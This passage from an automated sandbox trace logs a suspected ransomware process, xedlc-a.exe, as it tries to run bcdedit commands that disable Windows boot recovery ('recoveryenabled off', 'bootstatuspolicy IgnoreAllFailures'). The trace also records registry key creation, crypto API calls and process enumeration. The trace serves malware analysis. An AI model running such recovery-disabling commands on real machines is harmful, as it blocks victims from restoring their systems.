43410.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43411.           dllname: kernel32.dll
43412.           apiname: Sleep
43413.           address: 0x0041dca8
43414.           params:
43415.             param (id:1): 1000
43416.         file:
43417.           timestamp: 53474
43418.           mode: failed
43419.           sequenceNumber: 342
43420.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
43421.           processinfo:
43422.             tainted: true
43423.             pid: 1056
43424.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43425.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43426.             ads:
43427.           fid (ads:): 0
43428.           failure: open
43429.           ntstatus: 0xc000003a
43430.           CreateOptions: 0x200000
43431.           PE:
43432.             InspectionType: Ext
43433.         file:
43434.           timestamp: 53481
43435.           mode: failed
43436.           sequenceNumber: 343
43437.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootstatuspolicy.exe
43438.           processinfo:
43439.             tainted: true
43440.             pid: 1056
43441.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43442.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43443.             ads:
43444.           fid (ads:): 0
43445.           failure: open
43446.           ntstatus: 0xc000003a
43447.           CreateOptions: 0x200000
43448.           PE:
43449.             InspectionType: Ext
43450.         file:
43451.           timestamp: 53487
43452.           mode: failed
43453.           sequenceNumber: 344
43454.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
43455.           processinfo:
43456.             tainted: true
43457.             pid: 1056
43458.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43459.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43460.             ads:
43461.           fid (ads:): 0
43462.           failure: open
43463.           ntstatus: 0xc000003a
43464.           CreateOptions: 0x200000
43465.           PE:
43466.             InspectionType: Ext
43467.         file:
43468.           timestamp: 53492
43469.           mode: failed
43470.           sequenceNumber: 345
43471.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
43472.           processinfo:
43473.             tainted: true
43474.             pid: 1056
43475.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43476.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43477.             ads:
43478.           fid (ads:): 0
43479.           failure: open
43480.           ntstatus: 0xc000003a
43481.           CreateOptions: 0x200000
43482.           PE:
43483.             InspectionType: Ext
43484.         file:
43485.           timestamp: 53497
43486.           mode: failed
43487.           sequenceNumber: 346
43488.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
43489.           processinfo:
43490.             tainted: true
43491.             pid: 1056
43492.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43493.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43494.             ads:
43495.           fid (ads:): 0
43496.           failure: open
43497.           ntstatus: 0xc000003a
43498.           CreateOptions: 0x200000
43499.           PE:
43500.             InspectionType: Ext
43501.         file:
43502.           timestamp: 53504
43503.           mode: failed
43504.           sequenceNumber: 347
43505.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
43506.           processinfo:
43507.             tainted: true
43508.             pid: 1056
43509.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43510.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43511.             ads:
43512.           fid (ads:): 0
43513.           failure: open
43514.           ntstatus: 0xc000003a
43515.           CreateOptions: 0x200000
43516.           PE:
43517.             InspectionType: Ext
43518.         file:
43519.           timestamp: 53509
43520.           mode: failed
43521.           sequenceNumber: 348
43522.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
43523.           processinfo:
43524.             tainted: true
43525.             pid: 1056
43526.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43527.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43528.             ads:
43529.           fid (ads:): 0
43530.           failure: open
43531.           ntstatus: 0xc000003a
43532.           CreateOptions: 0x200000
43533.           PE:
43534.             InspectionType: Ext
43535.         file:
43536.           timestamp: 53516
43537.           mode: failed
43538.           sequenceNumber: 349
43539.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
43540.           processinfo:
43541.             tainted: true
43542.             pid: 1056
43543.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43544.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43545.             ads:
43546.           fid (ads:): 0
43547.           failure: open
43548.           ntstatus: 0xc000003a
43549.           CreateOptions: 0x200000
43550.           PE:
43551.             InspectionType: Ext
43552.         file:
43553.           timestamp: 53522
43554.           mode: failed
43555.           sequenceNumber: 350
43556.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
43557.           processinfo:
43558.             tainted: true
43559.             pid: 1056
43560.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43561.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43562.             ads:
43563.           fid (ads:): 0
43564.           failure: open
43565.           ntstatus: 0xc000003a
43566.           CreateOptions: 0x200000
43567.           PE:
43568.             InspectionType: Ext
43569.         file:
43570.           timestamp: 53528
43571.           mode: failed
43572.           sequenceNumber: 351
43573.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
43574.           processinfo:
43575.             tainted: true
43576.             pid: 1056
43577.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43578.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43579.             ads:
43580.           fid (ads:): 0
43581.           failure: open
43582.           ntstatus: 0xc000003a
43583.           CreateOptions: 0x200000
43584.           PE:
43585.             InspectionType: Ext
43586.         file:
43587.           timestamp: 53534
43588.           mode: failed
43589.           sequenceNumber: 352
43590.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootstatuspolicy IgnoreAllFailures.exe
43591.           processinfo:
43592.             tainted: true
43593.             pid: 1056
43594.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43595.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43596.             ads:
43597.           fid (ads:): 0
43598.           failure: open
43599.           ntstatus: 0xc000003a
43600.           CreateOptions: 0x200000
43601.           PE:
43602.             InspectionType: Ext
43603.         file:
43604.           timestamp: 53540
43605.           mode: failed
43606.           sequenceNumber: 353
43607.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
43608.           processinfo:
43609.             tainted: true
43610.             pid: 1056
43611.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43612.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43613.             ads:
43614.           fid (ads:): 0
43615.           failure: open
43616.           ntstatus: 0xc000003a
43617.           CreateOptions: 0x200000
43618.           PE:
43619.             InspectionType: Ext
43620.         file:
43621.           timestamp: 53545
43622.           mode: failed
43623.           sequenceNumber: 354
43624.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
43625.           processinfo:
43626.             tainted: true
43627.             pid: 1056
43628.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43629.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43630.             ads:
43631.           fid (ads:): 0
43632.           failure: open
43633.           ntstatus: 0xc000003a
43634.           CreateOptions: 0x200000
43635.           PE:
43636.             InspectionType: Ext
43637.         file:
43638.           timestamp: 53551
43639.           mode: failed
43640.           sequenceNumber: 355
43641.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
43642.           processinfo:
43643.             tainted: true
43644.             pid: 1056
43645.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43646.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43647.             ads:
43648.           fid (ads:): 0
43649.           failure: open
43650.           ntstatus: 0xc000003a
43651.           CreateOptions: 0x200000
43652.           PE:
43653.             InspectionType: Ext
43654.         file:
43655.           timestamp: 53560
43656.           mode: failed
43657.           sequenceNumber: 356
43658.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
43659.           processinfo:
43660.             tainted: true
43661.             pid: 1056
43662.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43663.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43664.             ads:
43665.           fid (ads:): 0
43666.           failure: open
43667.           ntstatus: 0xc000003a
43668.           CreateOptions: 0x200000
43669.           PE:
43670.             InspectionType: Ext
43671.         file:
43672.           timestamp: 53566
43673.           mode: failed
43674.           sequenceNumber: 357
43675.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
43676.           processinfo:
43677.             tainted: true
43678.             pid: 1056
43679.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43680.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43681.             ads:
43682.           fid (ads:): 0
43683.           failure: open
43684.           ntstatus: 0xc000003a
43685.           CreateOptions: 0x200000
43686.           PE:
43687.             InspectionType: Ext
43688.         file:
43689.           timestamp: 53572
43690.           mode: failed
43691.           sequenceNumber: 358
43692.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
43693.           processinfo:
43694.             tainted: true
43695.             pid: 1056
43696.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43697.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43698.             ads:
43699.           fid (ads:): 0
43700.           failure: open
43701.           ntstatus: 0xc000003a
43702.           CreateOptions: 0x200000
43703.           PE:
43704.             InspectionType: Ext
43705.         file:
43706.           timestamp: 53579
43707.           mode: failed
43708.           sequenceNumber: 359
43709.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
43710.           processinfo:
43711.             tainted: true
43712.             pid: 1056
43713.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43714.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43715.             ads:
43716.           fid (ads:): 0
43717.           failure: open
43718.           ntstatus: 0xc000003a
43719.           CreateOptions: 0x200000
43720.           PE:
43721.             InspectionType: Ext
43722.         apicall:
43723.           timestamp: 53583
43724.           sequenceNumber: 360
43725.           processinfo:
43726.             pid: 1056
43727.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43728.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43729.           dllname: dummy.dll
43730.           apiname: ProcessCreate_Failure
43731.           address: 0x7c81d627
43732.           params:
43733.             param (id:1): NULL
43734.             param (id:2): bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
43735.             param (id:3): 32
43736.             param (id:4): NULL
43737.         apicall:
43738.           timestamp: 53588
43739.           sequenceNumber: 361
43740.           processinfo:
43741.             pid: 1056
43742.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43743.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43744.           dllname: kernel32.dll
43745.           apiname: Sleep
43746.           address: 0x0041dca8
43747.           params:
43748.             param (id:1): 1000
43749.         file:
43750.           timestamp: 54613
43751.           mode: failed
43752.           sequenceNumber: 362
43753.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
43754.           processinfo:
43755.             tainted: true
43756.             pid: 1056
43757.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43758.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43759.             ads:
43760.           fid (ads:): 0
43761.           failure: open
43762.           ntstatus: 0xc000003a
43763.           CreateOptions: 0x200000
43764.           PE:
43765.             InspectionType: Ext
43766.         file:
43767.           timestamp: 54619
43768.           mode: failed
43769.           sequenceNumber: 363
43770.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} recoveryenabled.exe
43771.           processinfo:
43772.             tainted: true
43773.             pid: 1056
43774.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43775.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43776.             ads:
43777.           fid (ads:): 0
43778.           failure: open
43779.           ntstatus: 0xc000003a
43780.           CreateOptions: 0x200000
43781.           PE:
43782.             InspectionType: Ext
43783.         file:
43784.           timestamp: 54625
43785.           mode: failed
43786.           sequenceNumber: 364
43787.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
43788.           processinfo:
43789.             tainted: true
43790.             pid: 1056
43791.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43792.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43793.             ads:
43794.           fid (ads:): 0
43795.           failure: open
43796.           ntstatus: 0xc000003a
43797.           CreateOptions: 0x200000
43798.           PE:
43799.             InspectionType: Ext
43800.         file:
43801.           timestamp: 54631
43802.           mode: failed
43803.           sequenceNumber: 365
43804.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
43805.           processinfo:
43806.             tainted: true
43807.             pid: 1056
43808.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43809.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43810.             ads:
43811.           fid (ads:): 0
43812.           failure: open
43813.           ntstatus: 0xc000003a
43814.           CreateOptions: 0x200000
43815.           PE:
43816.             InspectionType: Ext
43817.         file:
43818.           timestamp: 54636
43819.           mode: failed
43820.           sequenceNumber: 366
43821.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
43822.           processinfo:
43823.             tainted: true
43824.             pid: 1056
43825.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43826.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43827.             ads:
43828.           fid (ads:): 0
43829.           failure: open
43830.           ntstatus: 0xc000003a
43831.           CreateOptions: 0x200000
43832.           PE:
43833.             InspectionType: Ext
43834.         file:
43835.           timestamp: 54647
43836.           mode: failed
43837.           sequenceNumber: 367
43838.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
43839.           processinfo:
43840.             tainted: true
43841.             pid: 1056
43842.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43843.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43844.             ads:
43845.           fid (ads:): 0
43846.           failure: open
43847.           ntstatus: 0xc000003a
43848.           CreateOptions: 0x200000
43849.           PE:
43850.             InspectionType: Ext
43851.         file:
43852.           timestamp: 54652
43853.           mode: failed
43854.           sequenceNumber: 368
43855.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
43856.           processinfo:
43857.             tainted: true
43858.             pid: 1056
43859.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43860.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43861.             ads:
43862.           fid (ads:): 0
43863.           failure: open
43864.           ntstatus: 0xc000003a
43865.           CreateOptions: 0x200000
43866.           PE:
43867.             InspectionType: Ext
43868.         file:
43869.           timestamp: 54657
43870.           mode: failed
43871.           sequenceNumber: 369
43872.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
43873.           processinfo:
43874.             tainted: true
43875.             pid: 1056
43876.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43877.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43878.             ads:
43879.           fid (ads:): 0
43880.           failure: open
43881.           ntstatus: 0xc000003a
43882.           CreateOptions: 0x200000
43883.           PE:
43884.             InspectionType: Ext
43885.         file:
43886.           timestamp: 54662
43887.           mode: failed
43888.           sequenceNumber: 370
43889.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
43890.           processinfo:
43891.             tainted: true
43892.             pid: 1056
43893.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43894.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43895.             ads:
43896.           fid (ads:): 0
43897.           failure: open
43898.           ntstatus: 0xc000003a
43899.           CreateOptions: 0x200000
43900.           PE:
43901.             InspectionType: Ext
43902.         file:
43903.           timestamp: 54667
43904.           mode: failed
43905.           sequenceNumber: 371
43906.           value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
43907.           processinfo:
43908.             tainted: true
43909.             pid: 1056
43910.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43911.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43912.             ads:
43913.           fid (ads:): 0
43914.           failure: open
43915.           ntstatus: 0xc000003a
43916.           CreateOptions: 0x200000
43917.           PE:
43918.             InspectionType: Ext
43919.         file:
43920.           timestamp: 54672
43921.           mode: failed
43922.           sequenceNumber: 372
43923.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} recoveryenabled off.exe
43924.           processinfo:
43925.             tainted: true
43926.             pid: 1056
43927.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43928.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43929.             ads:
43930.           fid (ads:): 0
43931.           failure: open
43932.           ntstatus: 0xc000003a
43933.           CreateOptions: 0x200000
43934.           PE:
43935.             InspectionType: Ext
43936.         file:
43937.           timestamp: 54685
43938.           mode: failed
43939.           sequenceNumber: 373
43940.           value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
43941.           processinfo:
43942.             tainted: true
43943.             pid: 1056
43944.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43945.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43946.             ads:
43947.           fid (ads:): 0
43948.           failure: open
43949.           ntstatus: 0xc000003a
43950.           CreateOptions: 0x200000
43951.           PE:
43952.             InspectionType: Ext
43953.         file:
43954.           timestamp: 54690
43955.           mode: failed
43956.           sequenceNumber: 374
43957.           value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
43958.           processinfo:
43959.             tainted: true
43960.             pid: 1056
43961.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43962.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43963.             ads:
43964.           fid (ads:): 0
43965.           failure: open
43966.           ntstatus: 0xc000003a
43967.           CreateOptions: 0x200000
43968.           PE:
43969.             InspectionType: Ext
43970.         file:
43971.           timestamp: 54695
43972.           mode: failed
43973.           sequenceNumber: 375
43974.           value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
43975.           processinfo:
43976.             tainted: true
43977.             pid: 1056
43978.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43979.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43980.             ads:
43981.           fid (ads:): 0
43982.           failure: open
43983.           ntstatus: 0xc000003a
43984.           CreateOptions: 0x200000
43985.           PE:
43986.             InspectionType: Ext
43987.         file:
43988.           timestamp: 54699
43989.           mode: failed
43990.           sequenceNumber: 376
43991.           value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
43992.           processinfo:
43993.             tainted: true
43994.             pid: 1056
43995.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
43996.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
43997.             ads:
43998.           fid (ads:): 0
43999.           failure: open
44000.           ntstatus: 0xc000003a
44001.           CreateOptions: 0x200000
44002.           PE:
44003.             InspectionType: Ext
44004.         file:
44005.           timestamp: 54704
44006.           mode: failed
44007.           sequenceNumber: 377
44008.           value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
44009.           processinfo:
44010.             tainted: true
44011.             pid: 1056
44012.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44013.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44014.             ads:
44015.           fid (ads:): 0
44016.           failure: open
44017.           ntstatus: 0xc000003a
44018.           CreateOptions: 0x200000
44019.           PE:
44020.             InspectionType: Ext
44021.         file:
44022.           timestamp: 54709
44023.           mode: failed
44024.           sequenceNumber: 378
44025.           value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
44026.           processinfo:
44027.             tainted: true
44028.             pid: 1056
44029.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44030.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44031.             ads:
44032.           fid (ads:): 0
44033.           failure: open
44034.           ntstatus: 0xc000003a
44035.           CreateOptions: 0x200000
44036.           PE:
44037.             InspectionType: Ext
44038.         file:
44039.           timestamp: 54714
44040.           mode: failed
44041.           sequenceNumber: 379
44042.           value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
44043.           processinfo:
44044.             tainted: true
44045.             pid: 1056
44046.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44047.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44048.             ads:
44049.           fid (ads:): 0
44050.           failure: open
44051.           ntstatus: 0xc000003a
44052.           CreateOptions: 0x200000
44053.           PE:
44054.             InspectionType: Ext
44055.         apicall:
44056.           timestamp: 54684
44057.           sequenceNumber: 380
44058.           processinfo:
44059.             pid: 1056
44060.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44061.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44062.           dllname: dummy.dll
44063.           apiname: ProcessCreate_Failure
44064.           address: 0x7c81d627
44065.           params:
44066.             param (id:1): NULL
44067.             param (id:2): bcdedit.exe /set {current} recoveryenabled off
44068.             param (id:3): 32
44069.             param (id:4): NULL
44070.         apicall:
44071.           timestamp: 54684
44072.           sequenceNumber: 381
44073.           processinfo:
44074.             pid: 1056
44075.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44076.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44077.           dllname: kernel32.dll
44078.           apiname: Sleep
44079.           address: 0x0041dca8
44080.           params:
44081.             param (id:1): 1000
44082.         regkey:
44083.           timestamp: 55669
44084.           mode: added
44085.           sequenceNumber: 382
44086.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\zsys\
44087.           processinfo:
44088.             pid: 1056
44089.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44090.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44091.         file:
44092.           timestamp: 55674
44093.           mode: failed
44094.           sequenceNumber: 383
44095.           value: C:\Documents and Settings\admin\Application Data\NETAPI32.DLL
44096.           processinfo:
44097.             tainted: true
44098.             pid: 1056
44099.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44100.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44101.             ads:
44102.           fid (ads:): 0
44103.           failure: open
44104.           ntstatus: 0xc0000034
44105.           CreateOptions: 0x200000
44106.           PE:
44107.             InspectionType: Ext
44108.         apicall:
44109.           timestamp: 56287
44110.           sequenceNumber: 384
44111.           processinfo:
44112.             pid: 1056
44113.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44114.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44115.           dllname: advapi32.dll
44116.           apiname: CryptAcquireContextW
44117.           address: 0x0041b858
44118.           params:
44119.             param (id:1): NULL
44120.             param (id:2): NULL
44121.             param (id:3): 1
44122.             param (id:4): 4026531840
44123.         file:
44124.           timestamp: 56368
44125.           mode: failed
44126.           sequenceNumber: 385
44127.           value: C:\Documents and Settings\admin\Application Data\rsaenh.dll
44128.           processinfo:
44129.             tainted: true
44130.             pid: 1056
44131.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44132.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44133.             ads:
44134.           fid (ads:): 0
44135.           failure: open
44136.           ntstatus: 0xc0000034
44137.           CreateOptions: 0x200000
44138.           PE:
44139.             InspectionType: Ext
44140.         file:
44141.           timestamp: 56373
44142.           mode: failed
44143.           sequenceNumber: 386
44144.           value: C:\DOCUME~1\admin\LOCALS~1\Temp\rsaenh.dll
44145.           processinfo:
44146.             tainted: true
44147.             pid: 1056
44148.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44149.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44150.             ads:
44151.           fid (ads:): 0
44152.           failure: open
44153.           ntstatus: 0xc0000034
44154.           CreateOptions: 0x200000
44155.           PE:
44156.             InspectionType: Ext
44157.         file:
44158.           timestamp: 56486
44159.           mode: failed
44160.           sequenceNumber: 387
44161.           value: C:\Documents and Settings\admin\Application Data\crypt32.dll
44162.           processinfo:
44163.             tainted: true
44164.             pid: 1056
44165.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44166.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44167.             ads:
44168.           fid (ads:): 0
44169.           failure: open
44170.           ntstatus: 0xc0000034
44171.           CreateOptions: 0x200000
44172.           PE:
44173.             InspectionType: Ext
44174.         apicall:
44175.           timestamp: 56519
44176.           sequenceNumber: 388
44177.           processinfo:
44178.             pid: 1056
44179.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44180.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44181.           dllname: advapi32.dll
44182.           apiname: CryptAcquireContextW
44183.           address: 0x0041b8ac
44184.           params:
44185.             param (id:1): NULL
44186.             param (id:2): Intel Hardware Cryptographic Service Provider
44187.             param (id:3): 22
44188.             param (id:4): 0
44189.         apicall:
44190.           timestamp: 56605
44191.           sequenceNumber: 389
44192.           processinfo:
44193.             pid: 1056
44194.             imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44195.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44196.           dllname: kernel32.dll
44197.           apiname: Process32First
44198.           address: 0x0041bb04
44199.           params:
44200.             param (id:1): 0x1c8
44201.             param (id:2): 0x12d4c8
44202.         malicious-alert:
44203.           classtype: Generic-Anomalous-Activity
44204.           weight: 0
44205.           ruleid: 8007 : Enumerating running processes ; Process is enumerating running processes
44206.           msg: Process is enumerating running processes
44207.           display-msg: Enumerating running processes
44208.         regkey:
44209.           timestamp: 56618
44210.           mode: setval
44211.           sequenceNumber: 390
44212.           value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\zsys\"ID" = 40 90 94 9d dc d5 a0 a4
44213.          processinfo:
44214.            pid: 1056
44215.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44216.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44217.        regkey:
44218.          timestamp: 56666
44219.          mode: added
44220.          sequenceNumber: 391
44221.          value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\4090949DDCD5A0A4
44222.          processinfo:
44223.            pid: 1056
44224.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
44225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
44226.        regkey:
44227.          timestamp: 56684
44228.          mode: setval
44229.          sequenceNumber: 392
